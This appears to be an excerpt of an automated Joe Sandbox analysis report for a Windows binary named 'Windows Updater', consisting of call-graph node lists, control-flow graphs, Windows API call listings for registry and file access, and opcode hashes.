65619 bd17e 65618->65619 65623 64250 56 API calls 65618->65623 65620 623d0 RaiseException 65619->65620 65621 bd188 65620->65621 65622 623d0 RaiseException 65621->65622 65624 bd192 65622->65624 65625 bcd64 65623->65625 65625->65619 65671 d02f0 65625->65671 65628 bcdc9 65630 64250 56 API calls 65628->65630 65629 bd04f 65686 67a60 59 API calls 65629->65686 65632 bcde5 65630->65632 65632->65619 65641 685d0 42 API calls 65632->65641 65633 bcda3 65635 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65633->65635 65634 bd062 65636 64250 56 API calls 65634->65636 65648 bd06c 65634->65648 65637 bd17a 65635->65637 65639 bd077 65636->65639 65638 bd0f4 RegCloseKey 65638->65633 65639->65621 65640 bd081 65639->65640 65644 67c10 3 API calls 65640->65644 65642 bce13 RegOpenKeyExW 65641->65642 65643 64250 56 API calls 65642->65643 65645 bce5d 65643->65645 65646 bd0a2 65644->65646 65645->65619 65649 685d0 42 API calls 65645->65649 65687 7c900 42 API calls 2 library calls 65646->65687 65648->65633 65648->65638 65650 bce8b RegOpenKeyExW 65649->65650 65651 bceb6 65650->65651 65652 bcecf 65651->65652 65653 bcfd4 65651->65653 65670 bcebc 65651->65670 65656 64250 56 API calls 65652->65656 65654 bcfe8 65653->65654 65655 bcfe5 RegCloseKey 65653->65655 65654->65633 65661 bd01b RegCloseKey 65654->65661 65655->65654 65657 bced4 65656->65657 65657->65619 65660 bcede 65657->65660 65658 bcf8f 65658->65633 65662 bcfc2 RegCloseKey 65658->65662 65659 bcf8c RegCloseKey 65659->65658 65663 67c10 3 API calls 65660->65663 65661->65633 65662->65633 65664 bceff 65663->65664 65684 7c900 42 API calls 2 library calls 65664->65684 65666 bcf1a 65667 67c10 3 API calls 65666->65667 65666->65670 65668 bcf39 65667->65668 65685 7c900 42 API calls 2 library calls 65668->65685 65670->65658 65670->65659 65672 624d0 41 API calls 65671->65672 65673 d0323 _wcschr 65672->65673 65674 bcd99 65673->65674 65675 69880 57 API calls 65673->65675 65674->65628 65674->65629 65674->65633 65676 d0370 _wcsrchr 65675->65676 65676->65674 65677 67870 57 API calls 65676->65677 65678 d054d 65677->65678 65679 685d0 42 API calls 65678->65679 65680 d055a 65679->65680 65681 69880 57 API calls 65680->65681 65682 d0588 65681->65682 65683 685d0 42 API calls 65682->65683 65683->65674 65684->65666 65685->65670 65686->65634 65687->65648 65688 bab70 65689 bab83 65688->65689 65697 baba0 65688->65697 65698 7e920 65689->65698 65693 babc0 65693->65697 65716 bbe40 65693->65716 65695 babcb 65695->65697 65732 bbc70 65695->65732 65699 7e95b 65698->65699 65705 7e9ff 65698->65705 65700 d7dfb 6 API calls 65699->65700 65701 7e965 __purecall 65700->65701 65701->65705 65749 7ea20 65701->65749 65705->65697 65706 bc0e0 65705->65706 65707 bc102 65706->65707 65708 7e920 70 API calls 65707->65708 65709 bc141 65707->65709 65713 bc160 65708->65713 65710 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65709->65710 65711 bc154 65710->65711 65711->65693 65712 bc299 65714 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65712->65714 65713->65709 65713->65712 65715 bc2ac 65714->65715 65715->65693 65717 bbe7b 65716->65717 65719 bbfe9 65716->65719 65805 7c900 42 API calls 2 library calls 65717->65805 65720 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65719->65720 65721 bc050 65720->65721 65721->65695 65722 64250 56 API calls 65731 bbea2 65722->65731 65723 bc054 65724 623d0 RaiseException 65723->65724 65725 bc05e 65724->65725 65808 68770 RaiseException 65725->65808 65727 bc06a 65727->65695 65728 624d0 41 API calls 65728->65731 65731->65719 65731->65722 65731->65723 65731->65725 65731->65728 65806 b5f20 58 API calls 3 library calls 65731->65806 65807 b62f0 RaiseException 65731->65807 65733 bbc8f 65732->65733 65734 bbd6c 65732->65734 65809 7c900 42 API calls 2 library calls 65733->65809 65736 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65734->65736 65737 bbd7d 65736->65737 65737->65697 65738 bbe24 65811 68770 RaiseException 65738->65811 65740 bbcb3 65740->65734 65740->65738 65743 bbe0f 65740->65743 65746 bbdc4 65740->65746 65810 bc2c0 92 API calls 2 library calls 65740->65810 65741 bbe30 65744 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65743->65744 65745 bbe20 65744->65745 65745->65697 65747 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65746->65747 65748 bbdd5 65747->65748 65748->65697 65750 7ea76 RegOpenKeyExW 65749->65750 65751 7ea9c RegQueryValueExW RegQueryValueExW 65750->65751 65752 7edab 65750->65752 65755 7eaff RegQueryValueExW 65751->65755 65756 7eb5b RegQueryValueExW 65751->65756 65753 7edd7 65752->65753 65754 7edc6 RegCloseKey 65752->65754 65757 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65753->65757 65754->65753 65755->65756 65759 7eb33 65755->65759 65760 7eb9e 65756->65760 65758 7e9ee 65757->65758 65780 d7db1 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 65758->65780 65759->65756 65761 7ec3c RegQueryValueExW 65760->65761 65764 7ebd9 RegQueryValueExW 65760->65764 65762 7ec8d RegQueryValueExW 65761->65762 65763 7ec69 65761->65763 65766 7ecba 65762->65766 65763->65762 65791 e1893 65764->65791 65768 7ed6b 65766->65768 65772 d7dfb 6 API calls 65766->65772 65767 7ec13 65771 7ec2b 65767->65771 65774 e1893 std::_Locinfo::_Locinfo_dtor 42 API calls 65767->65774 65769 7ed75 GetCurrentProcess IsWow64Process 65768->65769 65770 7ed9f 65768->65770 65769->65770 65773 7ed93 65769->65773 65781 7ee00 65770->65781 65771->65761 65775 7ed2e 65772->65775 65773->65770 65774->65771 65775->65768 65777 7ed3a GetModuleHandleW GetProcAddress 65775->65777 65801 d7db1 EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 65777->65801 65779 7ed68 65779->65768 65780->65705 65782 7ee58 RegOpenKeyExW 65781->65782 65783 7ee7e RegQueryValueExW 65782->65783 65790 7ef30 65782->65790 65786 7eeff RegQueryValueExW 65783->65786 65789 7eeb1 65783->65789 65784 7f10e 65787 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65784->65787 65785 7f0fd RegCloseKey 65785->65784 65786->65790 65788 7f126 65787->65788 65788->65752 65789->65786 65790->65784 65790->65785 65792 e18c4 65791->65792 65793 e18a1 65791->65793 65804 e18dc 42 API calls 3 library calls 65792->65804 65793->65792 65794 e18a7 65793->65794 65802 dd09d 14 API calls __Wcrtomb 65794->65802 65797 e18d7 65797->65767 65798 e18ac 65803 dcf9f 41 API calls ___std_exception_copy 65798->65803 65800 e18b7 65800->65767 65801->65779 65802->65798 65803->65800 65804->65797 65805->65731 65806->65731 65807->65731 65808->65727 65809->65740 65810->65740 65811->65741 65812 b46e0 65814 a03d0 5 API calls 65812->65814 65813 b46f9 65814->65813 65815 d3e60 65816 6d780 9 API calls 65815->65816 65817 d3e92 65816->65817 65818 d3e96 65817->65818 65819 d3ebd 65817->65819 65822 d3ed3 65817->65822 65954 a2340 57 API calls 65819->65954 65821 d3f2c 65890 68010 65821->65890 65822->65821 65857 b4720 65822->65857 65823 d3ece 65825 d3efe 65825->65821 65829 d3f02 65825->65829 65955 a2340 57 API calls 65829->65955 65831 d3fe0 65957 d4960 44 API calls std::_Locinfo::_Locinfo_dtor 65831->65957 65832 d3f13 65834 d426a 65960 68770 RaiseException 65834->65960 65835 d3fe7 65958 d4b20 44 API calls 2 library calls 65835->65958 65838 d4276 65839 623d0 RaiseException 65838->65839 65841 d4280 65839->65841 65840 d4073 65842 d407f GetSystemMetrics GetSystemMetrics 65840->65842 65849 d409d 65840->65849 65842->65849 65843 d3f64 65843->65831 65843->65834 65847 d4243 65843->65847 65904 d42a0 65843->65904 65956 d4640 95 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 65843->65956 65845 d4d10 44 API calls 65852 d3fee 65845->65852 65848 681e0 std::generic_category 14 API calls 65847->65848 65848->65823 65849->65834 65850 d413e 65849->65850 65959 bb560 61 API calls 3 library calls 65849->65959 65850->65834 65850->65847 65854 68280 43 API calls 65850->65854 65852->65834 65852->65838 65852->65840 65852->65845 65853 e1893 std::_Locinfo::_Locinfo_dtor 42 API calls 65852->65853 65853->65852 65854->65850 65856 a0490 63 API calls 65856->65843 65858 624d0 41 API calls 65857->65858 65859 b475c CreateFileW 65858->65859 65860 b479c 65859->65860 65887 b48a8 65859->65887 65861 b488a ReadFile 65860->65861 65862 b47a8 SetFilePointer ReadFile 65860->65862 65865 b48af 65861->65865 65861->65887 65866 b47e0 65862->65866 65886 b47d9 65862->65886 65863 b499b 65867 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65863->65867 65864 b498d CloseHandle 65864->65863 65868 64250 56 API calls 65865->65868 65865->65887 65869 64250 56 API calls 65866->65869 65866->65886 65870 b49d4 65867->65870 65875 b48c1 65868->65875 65882 b47f2 65869->65882 65870->65825 65871 b49da 65872 623d0 RaiseException 65871->65872 65873 b49e4 65872->65873 65874 64250 56 API calls 65873->65874 65876 b4a1b 65874->65876 65875->65871 65879 b48f6 65875->65879 65961 6c040 44 API calls 65875->65961 65877 b4a21 65876->65877 65878 b4a86 65876->65878 65889 a0490 63 API calls 65877->65889 65883 623d0 RaiseException 65878->65883 65879->65871 65879->65887 65880 b483d 65880->65871 65880->65886 65882->65871 65882->65880 65882->65882 65885 63430 RaiseException 65882->65885 65884 b4a90 65883->65884 65885->65880 65886->65887 65887->65863 65887->65864 65888 b4a45 65888->65825 65889->65888 65891 680b5 65890->65891 65895 6803f 65890->65895 65892 680cb 65891->65892 65894 e1a14 ___std_exception_copy 14 API calls 65891->65894 65896 c8160 65892->65896 65893 e1a14 ___std_exception_copy 14 API calls 65893->65891 65894->65892 65895->65893 65897 c818d 65896->65897 65898 c81d9 65896->65898 65900 c81d2 65897->65900 65903 681e0 std::generic_category 14 API calls 65897->65903 65899 c81ef 65898->65899 65901 e1a14 ___std_exception_copy 14 API calls 65898->65901 65899->65856 65902 e1a14 ___std_exception_copy 14 API calls 65900->65902 65901->65899 65902->65898 65903->65897 65962 b74d0 65904->65962 65906 d42ef 66005 b8830 65906->66005 65908 d4306 65909 64250 56 API calls 65908->65909 65950 d45b6 65908->65950 65911 d4315 65909->65911 65913 d431f 65911->65913 65914 d4608 65911->65914 65912 d45e1 65915 d7c97 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 65912->65915 65919 64250 56 API calls 65913->65919 65917 623d0 RaiseException 65914->65917 65916 d45fe 65915->65916 65916->65843 65918 d4612 65917->65918 65920 623d0 RaiseException 65918->65920 65921 d433b 65919->65921 65922 d461c 65920->65922 65921->65918 65927 d4345 65921->65927 65923 623d0 RaiseException 65922->65923 65924 d4626 65923->65924 65925 623d0 RaiseException 65924->65925 65926 d4630 65925->65926 65928 d4374 65927->65928 65929 63430 RaiseException 65927->65929 65952 a0490 63 API calls 65928->65952 65929->65928 65930 d4385 65931 d43bf 65930->65931 66162 680f0 41 API calls 65930->66162 65951 b4ac0 68 API calls 65931->65951 65933 64250 56 API calls 65934 d44d3 65933->65934 65934->65922 65935 d44dd 65934->65935 65936 64250 56 API calls 65935->65936 65937 d44f9 65936->65937 65937->65924 65941 d4503 65937->65941 65938 d43ed 65939 d4498 65938->65939 65940 624d0 41 API calls 65938->65940 65939->65933 65940->65939 65942 d4532 65941->65942 65943 63430 RaiseException 65941->65943 65953 a0490 63 API calls 65942->65953 65943->65942 65944 d4544 65945 d457b 65944->65945 66163 680f0 41 API calls 65944->66163 66164 d58f0 57 API calls 65945->66164 65948 d458a 65949 681e0 std::generic_category 14 API calls 65948->65949 65949->65950 66165 94c40 14 API calls 2 library calls 65950->66165 65951->65938 65952->65930 65953->65944 65954->65823 65955->65832 65956->65843 65957->65835 65958->65852 65959->65849 65960->65838 65961->65879 65963 64250 56 API calls 65962->65963 65964 b750d 65963->65964 65965 b7a92 65964->65965 65969 64250 56 API calls 65964->65969 65966 623d0 RaiseException 65965->65966 65967 b7a9c 65966->65967 66166 94c40 14 API calls 2 library calls 65967->66166 65971 b7535 65969->65971 65970 b7aa8 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 65970->65906 65971->65965 65972 64250 56 API calls 65971->65972 65973 b755a 65972->65973 65973->65965 65974 64250 56 API calls 65973->65974 65975 b757f 65974->65975 65975->65965 65976 69cc0 RaiseException 65975->65976 65977 b76d5 65975->65977 65976->65975 65978 64250 56 API calls 65977->65978 65979 b76ea 65978->65979 65979->65965 65980 64250 56 API calls 65979->65980 65981 b7712 65980->65981 65981->65965 65982 64250 56 API calls 65981->65982 65983 b7787 65982->65983 65983->65965 65984 64250 56 API calls 65983->65984 65985 b77af 65984->65985 65985->65965 65986 64250 56 API calls 65985->65986 65987 b7860 65986->65987 65987->65965 65988 64250 56 API calls 65987->65988 65989 b7888 65988->65989 65989->65965 65990 64250 56 API calls 65989->65990 65991 b78b0 65990->65991 65991->65965 65992 64250 56 API calls 65991->65992 65993 b78d8 65992->65993 65993->65965 65994 64250 56 API calls 65993->65994 65995 b7900 65994->65995 65995->65965 65996 64250 56 API calls 65995->65996 65997 b7928 65996->65997 65997->65965 65998 64250 56 API calls 65997->65998 65999 b7a05 65998->65999 65999->65965 66000 64250 56 API calls 65999->66000 66001 b7a2d 66000->66001 66001->65965 66002 b7a33 66001->66002 66003 e1893 std::_Locinfo::_Locinfo_dtor 42 API calls 66002->66003 66004 b7a63 66003->66004 66004->65906 66006 685d0 42 API calls 66005->66006 66007 b8866 66006->66007 66008 64250 56 API calls 66007->66008 66009 b888c 66008->66009 66010 b9105 66009->66010 66013 b8896 66009->66013 66011 623d0 RaiseException 66010->66011 66012 b910f 66011->66012 66014 623d0 RaiseException 66012->66014 66016 b88c8 66013->66016 66018 63430 RaiseException 66013->66018 66015 b9119 66014->66015 66017 623d0 RaiseException 66015->66017 66160 a0490 63 API calls 66016->66160 66019 b9123 66017->66019 66018->66016 66020 623d0 RaiseException 66019->66020 66022 b912d 66020->66022 66021 b88dd 66024 b90ec 66021->66024 66025 64250 56 API calls 66021->66025 66023 623d0 RaiseException 66022->66023 66026 b9137 66023->66026 66024->65908 66027 b8919 66025->66027 66028 623d0 RaiseException 66026->66028 66027->66012 66033 b8923 66027->66033 66029 b9141 66028->66029 66288 68770 RaiseException 66029->66288 66031 b914d 66032 623d0 RaiseException 66031->66032 66034 b9157 66032->66034 66035 b8955 66033->66035 66037 63430 RaiseException 66033->66037 66036 623d0 RaiseException 66034->66036 66158 b4720 70 API calls 66035->66158 66038 b9161 66036->66038 66037->66035 66040 623d0 RaiseException 66038->66040 66039 b8970 66145 b4ac0 68 API calls 66039->66145 66041 b916b 66040->66041 66042 623d0 RaiseException 66041->66042 66044 b9175 66042->66044 66043 b89a9 66147 b4ac0 68 API calls 66043->66147 66045 623d0 RaiseException 66044->66045 66046 b917f 66045->66046 66048 623d0 RaiseException 66046->66048 66047 b89c0 66148 b4ac0 68 API calls 66047->66148 66049 b9189 66048->66049 66051 623d0 RaiseException 66049->66051 66050 b89dd 66153 b4ac0 68 API calls 66050->66153 66052 b9193 66051->66052 66053 b89f6 66154 b4ac0 68 API calls 66053->66154 66054 b8a0f 66156 b4ac0 68 API calls 66054->66156 66055 b8a28 66056 64250 56 API calls 66055->66056 66057 b8a35 66056->66057 66057->66015 66058 b8a3f 66057->66058 66059 b8a71 66058->66059 66060 63430 RaiseException 66058->66060 66142 b4720 70 API calls 66059->66142 66060->66059 66061 b8a89 66061->66024 66146 b4ac0 68 API calls 66061->66146 66062 b8ad1 66063 64250 56 API calls 66062->66063 66064 b8ade 66063->66064 66064->66019 66065 b8ae8 66064->66065 66066 b8b1a 66065->66066 66067 63430 RaiseException 66065->66067 66155 a0490 63 API calls 66066->66155 66067->66066 66068 b8b32 66069 64250 56 API calls 66068->66069 66070 b8b61 66069->66070 66070->66022 66071 b8b6b 66070->66071 66072 b8b9d 66071->66072 66073 63430 RaiseException 66071->66073 66144 a0490 63 API calls 66072->66144 66073->66072 66074 b8bb5 66075 64250 56 API calls 66074->66075 66076 b8be4 66075->66076 66076->66026 66077 b8bee 66076->66077 66078 b8c20 66077->66078 66079 63430 RaiseException 66077->66079 66079->66078 66142->66061 66144->66074 66145->66043 66146->66062 66147->66047 66148->66050 66153->66053 66154->66054 66155->66068 66156->66055 66158->66039 66160->66021 66162->65931 66163->65945 66164->65948 66165->65912 66166->65970 66288->66031

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 1610 98770-987ae call 64250 1613 987eb-98831 call 623d0 call 64250 1610->1613 1614 987b0-987e8 call 9a050 1610->1614 1622 98990-989d0 call 623d0 call 64250 1613->1622 1623 98837-9885e call 9a050 1613->1623 1631 98af2-98b31 call 623d0 call 64250 1622->1631 1632 989d6-989fd call 9a050 1622->1632 1633 98860-98862 1623->1633 1634 98867-98885 call 64250 1623->1634 1651 98c7a-98cc0 call 623d0 call 64250 1631->1651 1652 98b37-98b5e call 9a050 1631->1652 1648 98ac0-98ad5 1632->1648 1649 98a03-98a21 call 64250 1632->1649 1637 9895b-98970 1633->1637 1634->1622 1643 9888b-988f8 call 685d0 RegCreateKeyExW call 67b90 1634->1643 1639 9897a-9898d 1637->1639 1640 98972-98975 1637->1640 1640->1639 1672 988fa-988fc 1643->1672 1673 988fe-9890a 1643->1673 1656 98adf-98aef 1648->1656 1657 98ad7-98ada 1648->1657 1649->1631 1662 98a27-98a6f call 685d0 RegCreateKeyExW 1649->1662 1670 98dea-98e31 call 623d0 call 64250 1651->1670 1671 98cc6-98ced call 9a050 1651->1671 1674 98b60-98b62 1652->1674 1675 98b67-98b85 call 64250 1652->1675 1657->1656 1690 98a71-98a80 RegSetValueExW 1662->1690 1691 98a86-98a8f 1662->1691 1701 98f89-99001 call 623d0 FileTimeToSystemTime call 64250 1670->1701 1702 98e37-98e5e call 9a050 1670->1702 1704 98db8-98dcd 1671->1704 1705 98cf3-98d11 call 64250 1671->1705 1677 9890d-9892a call d8160 1672->1677 1673->1677 1678 98c45-98c5a 1674->1678 1675->1651 1689 98b8b-98bd3 call 685d0 RegCreateKeyExW 1675->1689 1698 9892c-9892d RegCloseKey 1677->1698 1699 98933-98951 1677->1699 1684 98c5c-98c5f 1678->1684 1685 98c64-98c77 1678->1685 1684->1685 1718 98c09 1689->1718 1719 98bd5-98bf8 RegQueryValueExW 1689->1719 1690->1691 1695 98a98-98ab6 1691->1695 1696 98a91-98a92 RegCloseKey 1691->1696 1695->1648 1706 98ab8-98abb 1695->1706 1696->1695 1698->1699 1699->1637 1700 98953-98956 1699->1700 1700->1637 1726 99007-9902e call 9a050 1701->1726 1727 99136-99140 call 623d0 1701->1727 1728 98e60-98e62 1702->1728 1729 98e67-98e85 call 64250 1702->1729 1709 98dcf-98dd2 1704->1709 1710 98dd7-98de7 1704->1710 1705->1670 1720 98d17-98d66 call 685d0 RegCreateKeyExW 1705->1720 1706->1648 1709->1710 1724 98c0b-98c14 1718->1724 1719->1718 1723 98bfa-98c07 1719->1723 1743 98d68-98d78 RegSetValueExW 1720->1743 1744 98d7e-98d87 1720->1744 1723->1724 1730 98c1d-98c3b 1724->1730 1731 98c16-98c17 RegCloseKey 1724->1731 1751 990fa-9910f 1726->1751 1752 99034-9905a call 64250 1726->1752 1733 98f54-98f69 1728->1733 1729->1701 1746 98e8b-98ef1 call 685d0 RegCreateKeyExW call 67b90 1729->1746 1730->1678 1735 98c3d-98c40 1730->1735 1731->1730 1740 98f6b-98f6e 1733->1740 1741 98f73-98f86 1733->1741 1735->1678 1740->1741 1743->1744 1747 98d89-98d8a RegCloseKey 1744->1747 1748 98d90-98dae 1744->1748 1765 98ef3-98ef5 1746->1765 1766 98ef7-98f03 1746->1766 1747->1748 1748->1704 1750 98db0-98db3 1748->1750 1750->1704 1754 99119-99133 call d7c97 1751->1754 1755 99111-99114 1751->1755 1752->1727 1763 99060-990ab call 685d0 RegCreateKeyExW 1752->1763 1755->1754 1772 990ad-990ba RegSetValueExW 1763->1772 1773 990c0-990c9 1763->1773 1768 98f06-98f23 call d8160 1765->1768 1766->1768 1777 98f2c-98f4a 1768->1777 1778 98f25-98f26 RegCloseKey 1768->1778 1772->1773 1775 990cb-990cc RegCloseKey 1773->1775 1776 990d2-990f0 1773->1776 1775->1776 1776->1751 1779 990f2-990f5 1776->1779 1777->1733 1780 98f4c-98f4f 1777->1780 1778->1777 1779->1751 1780->1733
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                                                          • Opcode ID: a24c8fe961180e31f6dc3e11bfe0b09eb7c71c0401ffa3d9d45cf41938db301c
                                                                                                                                                                                                                                                                          • Instruction ID: 0efd49009964f0c8edbe88b2d85118646668953221d61c37faa3ae4822ec9edb
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a24c8fe961180e31f6dc3e11bfe0b09eb7c71c0401ffa3d9d45cf41938db301c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45628D71A00209EFDF10CFA8C845BAEBBF8FF45714F148259E915AB391DB759A04DB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 2906 c8850-c8913 CoInitializeEx DefWindowProcW InitCommonControlsEx LoadLibraryW call c8f10 call 67780 call c0850 2913 c891d-c896b call c0f50 call c8ac0 FreeLibrary EnterCriticalSection 2906->2913 2914 c8915-c8918 2906->2914 2919 c896d-c8971 2913->2919 2920 c89b5-c89d9 LeaveCriticalSection 2913->2920 2914->2913 2921 c8983-c8985 2919->2921 2922 c8973-c897d DestroyWindow 2919->2922 2923 c8a19-c8a21 2920->2923 2924 c89db-c89df 2920->2924 2921->2920 2925 c8987-c898b 2921->2925 2922->2921 2926 c8a4b-c8a59 2923->2926 2927 c8a23-c8a26 2923->2927 2928 c89f0-c89f5 2924->2928 2929 c89e1-c89ea call e1a14 2924->2929 2930 c899c-c89b2 call d8122 2925->2930 2931 c898d-c8996 call e1a14 2925->2931 2934 c8a7a-c8aa2 call c9070 CoUninitialize call d7c97 2926->2934 2935 c8a5b 2926->2935 2927->2926 2932 c8a28-c8a2d 2927->2932 2936 c8a07-c8a16 call d8122 2928->2936 2937 c89f7-c8a00 call e1a14 2928->2937 2929->2928 2930->2920 2931->2930 2943 c8a2f-c8a31 2932->2943 2944 c8a35-c8a49 2932->2944 2957 c8aa7-c8aae 2934->2957 2946 c8a60-c8a64 2935->2946 2936->2923 2937->2936 2943->2944 2944->2926 2944->2932 2947 c8a66-c8a6d 2946->2947 2948 c8a73-c8a78 2946->2948 2947->2948 2948->2934 2948->2946
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CoInitializeEx.OLE32(00000000,00000002,8726ECAD,?,?,?,?,?,0010B93D,000000FF), ref: 000C88A1
                                                                                                                                                                                                                                                                          • DefWindowProcW.USER32(00000000,00000000,00000000,00000000,?,?,?,?,?,0010B93D,000000FF), ref: 000C88AF
                                                                                                                                                                                                                                                                          • InitCommonControlsEx.COMCTL32(?,?,?,?,?,?,0010B93D,000000FF), ref: 000C88C7
                                                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(RICHED20.DLL,?,?,?,?,?,0010B93D,000000FF), ref: 000C88D2
                                                                                                                                                                                                                                                                            • Part of subcall function 000C8F10: GetCurrentThreadId.KERNEL32 ref: 000C8F6D
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,0010B93D,000000FF), ref: 000C893B
                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0013E2E4,?,?,0010B93D,000000FF), ref: 000C8959
                                                                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,?,?,0010B93D,000000FF), ref: 000C8977
                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(0013E2E4,?,?,0010B93D,000000FF), ref: 000C89C0
                                                                                                                                                                                                                                                                          • CoUninitialize.OLE32(?,?,0010B93D,000000FF), ref: 000C8A84
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CriticalLibrarySectionWindow$CommonControlsCurrentDestroyEnterFreeInitInitializeLeaveLoadProcThreadUninitialize
                                                                                                                                                                                                                                                                          • String ID: RICHED20.DLL
                                                                                                                                                                                                                                                                          • API String ID: 2001424392-992299850
                                                                                                                                                                                                                                                                          • Opcode ID: 910f78a3d4c7be16af1981f12548b733ecdf235b0a429191f244da377e428473
                                                                                                                                                                                                                                                                          • Instruction ID: 47a05232106df4badef6bff4d948e820bcfa46d552b90fd8ccf03acf75079735
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 910f78a3d4c7be16af1981f12548b733ecdf235b0a429191f244da377e428473
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3161BD71900205DFEB20DF68CC49BAEBBF4BF04710F14812DE855AB691DBB0A944CB96
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,8726ECAD), ref: 000B4778
                                                                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000), ref: 000B47AD
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000A,?,00000000), ref: 000B47CF
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00000005,?,00000000), ref: 000B489E
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 000B498E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000001C.00000002.2533254784.0000000000061000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2533231425.0000000000060000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534122744.000000000010F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534199498.000000000013C000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 0000001C.00000002.2534273383.000000000013F000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_28_2_60000_Windows Updater.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlePointer
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3856724686-0
                                                                                                                                                                                                                                                                          • Opcode ID: b0a241787a9b721b8736c5f7a80261ac13ddd685327cf0cba18e8bbf8f62bc3f
